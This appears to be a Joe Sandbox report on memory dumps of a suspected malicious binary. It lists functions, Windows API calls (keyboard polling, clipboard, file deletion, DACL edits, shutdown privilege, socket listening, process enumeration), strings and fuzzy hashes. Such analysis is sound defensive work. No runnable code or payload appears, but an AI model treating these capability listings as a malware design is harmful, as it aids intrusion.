Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
String ID: 0
API String ID: 3616455698-4108050209
Opcode ID: 9919e61becf1b29b0c3d64858c67714e27484d2eb7b04c07bd22b8501a3bc584
Instruction ID: 2604649de1fe6f26e306c749459a0bb43b87cc80afebb1872ff86dc4f7f1b1d4
Opcode Fuzzy Hash: 9919e61becf1b29b0c3d64858c67714e27484d2eb7b04c07bd22b8501a3bc584
Instruction Fuzzy Hash: 12815871504309AFD720CF15C984ABBBBE9EF88314F00492EFA9597291D774DD09CBAA

Function 004CA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004CABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004CABD7
Part of subcall function 004CABBB: GetLastError.KERNEL32(?,004CA69F,?,?,?), ref: 004CABE1
Part of subcall function 004CABBB: GetProcessHeap.KERNEL32(00000008,?,?,004CA69F,?,?,?), ref: 004CABF0
Part of subcall function 004CABBB: RtlAllocateHeap.NTDLL(00000000,?,004CA69F), ref: 004CABF7
Part of subcall function 004CABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004CAC0E

Part of subcall function 004CAC56: GetProcessHeap.KERNEL32(00000008,004CA6B5,00000000,00000000,?,004CA6B5,?), ref: 004CAC62
Part of subcall function 004CAC56: RtlAllocateHeap.NTDLL(00000000,?,004CA6B5), ref: 004CAC69
Part of subcall function 004CAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004CA6B5,?), ref: 004CAC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004CA6D0
_memset.LIBCMT ref: 004CA6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004CA704
GetLengthSid.ADVAPI32(?), ref: 004CA715
GetAce.ADVAPI32(?,00000000,?), ref: 004CA752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004CA76E
GetLengthSid.ADVAPI32(?), ref: 004CA78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004CA79A
RtlAllocateHeap.NTDLL(00000000), ref: 004CA7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 004CA7C2
CopySid.ADVAPI32(00000000), ref: 004CA7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004CA7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004CA820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 004CA834

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 2347767575-0
Opcode ID: 7856458b444fa16de4e4f12d272a304bf2a4bd3488d442d1edd55112e504abb6
Instruction ID: 8c0bbbdb7689505e961d5a44423d18808618491a31ca2b3c4208b3a10248e7ff
Opcode Fuzzy Hash: 7856458b444fa16de4e4f12d272a304bf2a4bd3488d442d1edd55112e504abb6
Instruction Fuzzy Hash: 69513C75900209ABDF10DF95DC48EEFBBB9FF04308F04812EE915A6290E739DA15DB65

Function 00496F07 Relevance: 19.6, Strings: 15, Instructions: 883COMMON

Download Yara Rule

Strings

LIMIT_MATCH=, xrefs: 00512CF2
ANY), xrefs: 00512E60
CRLF), xrefs: 00512E43
UTF), xrefs: 00512C7C
BSR_ANYCRLF), xrefs: 00512EA0
UTF16), xrefs: 00512C56
CR), xrefs: 00512E09
BSR_UNICODE), xrefs: 00512EBA
UCP), xrefs: 00512C8F
SSS S, xrefs: 00497096, 0049709C
LIMIT_RECURSION=, xrefs: 00512D7E
LF), xrefs: 00512E26
NO_START_OPT), xrefs: 00512CD1
ANYCRLF), xrefs: 00512E7D
NO_AUTO_POSSESS), xrefs: 00512CB0

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$SSS S
API String ID: 0-428035616
Opcode ID: 46a06dd271c921a723602d1cca73c1185ca34a9307296943713104edf0adb497
Instruction ID: b8e377be13ad5c209a71bd1ee2e08a1cf7f871181d63f46fed73765c9263c3ab
Opcode Fuzzy Hash: 46a06dd271c921a723602d1cca73c1185ca34a9307296943713104edf0adb497
Instruction Fuzzy Hash: 29728171E142199BDF24CF59C8817EEBBB5BF48310F14816AE805EB281EB749E81DF94

Function 004D63F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004D6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004D5FA6,?), ref: 004D6ED8

Part of subcall function 004D72CB: GetFileAttributesW.KERNEL32(?,004D6019), ref: 004D72CC

_wcscat.LIBCMT ref: 004D6441
__wsplitpath.LIBCMT ref: 004D645F
FindFirstFileW.KERNEL32(?,?), ref: 004D6474
_wcscpy.LIBCMT ref: 004D64A3
_wcscat.LIBCMT ref: 004D64B8
_wcscat.LIBCMT ref: 004D64CA
DeleteFileW.KERNEL32(?), ref: 004D64DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 004D64EB
FindClose.KERNEL32(00000000), ref: 004D6506

Strings

\*.*, xrefs: 004D643B

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: afe68666dd2f0ef0516fd0ae885fcc179fc244ae7288d517ec831f7a78918096
Instruction ID: 7efd808c072c1dc68238f7680a8d555fe173a5e8caebe7305a75f79a671c9f35
Opcode Fuzzy Hash: afe68666dd2f0ef0516fd0ae885fcc179fc244ae7288d517ec831f7a78918096
Instruction Fuzzy Hash: 3B31B1B2408384AAC721DBA488959DBB7ECAF55304F40492FF5D9C3241EB39D50D87BB

Function 004F31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004F3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004F2BB5,?,?), ref: 004F3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004F328E

Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004F332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004F33C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 004F3604
RegCloseKey.ADVAPI32(00000000), ref: 004F3611

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: aff1ae3c64b2ea2441e5a43e5e4f89c09441b4e7748ad9ff421fe906885f27d7
Instruction ID: 9793a90c26590665e4ca848d37d9ae8dd8d3e72b7573310ea46eb790755623df
Opcode Fuzzy Hash: aff1ae3c64b2ea2441e5a43e5e4f89c09441b4e7748ad9ff421fe906885f27d7
Instruction Fuzzy Hash: 5BE17C31604204AFCB14DF29C995D6BBBE8EF89314F04846EF94ACB2A1DB34ED05CB56

Function 004D2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 004D2B5F
GetAsyncKeyState.USER32(000000A0), ref: 004D2BE0
GetKeyState.USER32(000000A0), ref: 004D2BFB
GetAsyncKeyState.USER32(000000A1), ref: 004D2C15
GetKeyState.USER32(000000A1), ref: 004D2C2A
GetAsyncKeyState.USER32(00000011), ref: 004D2C42
GetKeyState.USER32(00000011), ref: 004D2C54
GetAsyncKeyState.USER32(00000012), ref: 004D2C6C
GetKeyState.USER32(00000012), ref: 004D2C7E
GetAsyncKeyState.USER32(0000005B), ref: 004D2C96
GetKeyState.USER32(0000005B), ref: 004D2CA8

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 42a1b309f92877b970ee9dc3241ea7a47f6e9c0e49e88085ed06294d5799be4e
Instruction ID: 44864742f4a197eb6f4d0c06043a98a7051002e00c0403dfd2e1328c56ac37d7
Opcode Fuzzy Hash: 42a1b309f92877b970ee9dc3241ea7a47f6e9c0e49e88085ed06294d5799be4e
Instruction Fuzzy Hash: AE41D634514BC96DFF319B608A243ABBEA16B31704F04805BD5C6563C2DBDC9DC8C7AA

Function 004E6D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004E6D2E
EmptyClipboard.USER32 ref: 004E6D34
GlobalAlloc.KERNEL32(00000002,?), ref: 004E6D49
CloseClipboard.USER32 ref: 004E6DE8

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: f7a882ff700bea320c13f5d5a83d49f58311ffcad6a9f8d732d72eaa771a91b4
Instruction ID: 76b3148235b7a6311779cae7b802249f661695c1c397c8bf03d168b3de160066
Opcode Fuzzy Hash: f7a882ff700bea320c13f5d5a83d49f58311ffcad6a9f8d732d72eaa771a91b4
Instruction Fuzzy Hash: 6721B135300110AFDB00AF26DC49FAE77A8EF24761F01C41AF906DB2A1DB78EC019B69

Function 004EC18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 004C9ABF: CLSIDFromProgID.COMBASE ref: 004C9ADC
Part of subcall function 004C9ABF: ProgIDFromCLSID.COMBASE(?,00000000), ref: 004C9AF7
Part of subcall function 004C9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 004C9B05
Part of subcall function 004C9ABF: CoTaskMemFree.COMBASE(00000000), ref: 004C9B15

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 004EC235
_memset.LIBCMT ref: 004EC242
_memset.LIBCMT ref: 004EC360
CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 004EC38C
CoTaskMemFree.COMBASE(?), ref: 004EC397

Strings

NULL Pointer assignment, xrefs: 004EC3E5

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: fded29e81bfbec1bb7620fc672d0d75e5839801de133a7521a5181d11693007b
Instruction ID: 90442a075211d5c3e4cc317d7e53f05da0d9afe04e89727a76583fd663e07784
Opcode Fuzzy Hash: fded29e81bfbec1bb7620fc672d0d75e5839801de133a7521a5181d11693007b
Instruction Fuzzy Hash: E2916E71D00218ABDF10DF96DC91EDEBBB8EF04314F10816AF915A7281EB746A45CFA4

Function 004D13CA Relevance: 11.1, APIs: 1, Strings: 6, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 004D13DC

Strings

Release, xrefs: 004D16FA
QueryInterface, xrefs: 004D1622
InterfaceDispatch, xrefs: 004D158E
|, xrefs: 004D140C
AddRef, xrefs: 004D16B1
(, xrefs: 004D1422

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: lstrlen
String ID: ($AddRef$InterfaceDispatch$QueryInterface$Release$|
API String ID: 1659193697-2318614619
Opcode ID: 57933fa3ca710fd77b53b47ec8e1c529aa0c3752ebcc8393bfe12e5f5fd188da
Instruction ID: 966c8281375752caf2863845cebb76a4e5bf78c0b2ad94a1e7458100de8b8eb9
Opcode Fuzzy Hash: 57933fa3ca710fd77b53b47ec8e1c529aa0c3752ebcc8393bfe12e5f5fd188da
Instruction Fuzzy Hash: 1C323575A00705AFC728CF69D490AAAB7F0FF48310B11C56EE89ADB3A1E774E941CB44

Function 00500133 Relevance: 10.7, APIs: 7, Instructions: 245windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F

GetSystemMetrics.USER32(0000000F), ref: 0050016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0050038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 005003AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 005003D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 005003FF
ShowWindow.USER32(00000003,00000000), ref: 00500421
NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00500440

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$MessageSend$DialogInvalidateLongMetricsMoveNtdllProc_RectShowSystem
String ID:
API String ID: 2922825909-0
Opcode ID: a07d335ce658741ada19e967d4db00153e2ac779a3e0f8f2977f4ff60753e01b
Instruction ID: 9460f90f4e6609ff636b5dc915ed300886420dfbe3a1a4b1e28cc1016c31428f
Opcode Fuzzy Hash: a07d335ce658741ada19e967d4db00153e2ac779a3e0f8f2977f4ff60753e01b
Instruction Fuzzy Hash: 3EA19A35600616EBDB19CF68C9897FEBBB1BB48701F049525ED58AA2D0D734AD60CB90

Function 004FECD4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F

Part of subcall function 004AB63C: GetCursorPos.USER32(000000FF), ref: 004AB64F
Part of subcall function 004AB63C: ScreenToClient.USER32(00000000,000000FF), ref: 004AB66C
Part of subcall function 004AB63C: GetAsyncKeyState.USER32(00000001), ref: 004AB691
Part of subcall function 004AB63C: GetAsyncKeyState.USER32(00000002), ref: 004AB69F

ReleaseCapture.USER32 ref: 004FED48
SetWindowTextW.USER32(?,00000000), ref: 004FEDF0
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 004FEE03
NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 004FEEDC

Strings

@GUI_DROPID, xrefs: 004FEE33
@GUI_DRAGFILE, xrefs: 004FEE77

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 973565025-2107944366
Opcode ID: 5588a1d4ef016d1e60861e72972e77205800dfa8ced4388745564222eb361d62
Instruction ID: 768f79b0aa6bfaf678d9a3026d80fa4632a87684124abfc24d15615919dca2a8
Opcode Fuzzy Hash: 5588a1d4ef016d1e60861e72972e77205800dfa8ced4388745564222eb361d62
Instruction Fuzzy Hash: EA51CD70104304AFD710DF25DC9AFAA7BE4FB98309F00492EF695972E2DB749908DB56

Function 004D79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 004CB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004CB180
Part of subcall function 004CB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004CB1AD
Part of subcall function 004CB134: GetLastError.KERNEL32 ref: 004CB1BA

ExitWindowsEx.USER32(?,00000000), ref: 004D7A0F

Strings

@, xrefs: 004D7A02
, xrefs: 004D79FD
SeShutdownPrivilege, xrefs: 004D79DD

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 11428d77fb6c13860919c186791e6647cb796328335491fa6fe1cff1853e2b6b
Instruction ID: 2f9594e2275a6c088a4495c099644fff5f228801ff55cb2ef1f16f9f66d2830b
Opcode Fuzzy Hash: 11428d77fb6c13860919c186791e6647cb796328335491fa6fe1cff1853e2b6b
Instruction Fuzzy Hash: D001FC716582216BFB281764DC7AFBF73589700384F14441BFD53A23D2F9685E0181BD

Function 004E8C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004E8CA8
WSAGetLastError.WS2_32(00000000), ref: 004E8CB7
bind.WS2_32(00000000,?,00000010), ref: 004E8CD3
listen.WS2_32(00000000,00000005), ref: 004E8CE2
WSAGetLastError.WS2_32(00000000), ref: 004E8CFC
closesocket.WS2_32(00000000), ref: 004E8D10

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 2b1993d59d7aa95be68821190df4df9c56c0f1fd8f2142051a4e003e4e917219
Instruction ID: e361ead6f05a20663da7321affe97cda473fbe2f5ab2b88748f0e0748e5edb1c
Opcode Fuzzy Hash: 2b1993d59d7aa95be68821190df4df9c56c0f1fd8f2142051a4e003e4e917219
Instruction Fuzzy Hash: 3D21E3316001009FCB10EF29CD45B6EB7B9EF59315F14815EF816A73D2CB38AD019B65

Function 004D6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004D6554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 004D6564
Process32NextW.KERNEL32(00000000,0000022C), ref: 004D6583
__wsplitpath.LIBCMT ref: 004D65A7
_wcscat.LIBCMT ref: 004D65BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 004D65F9

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
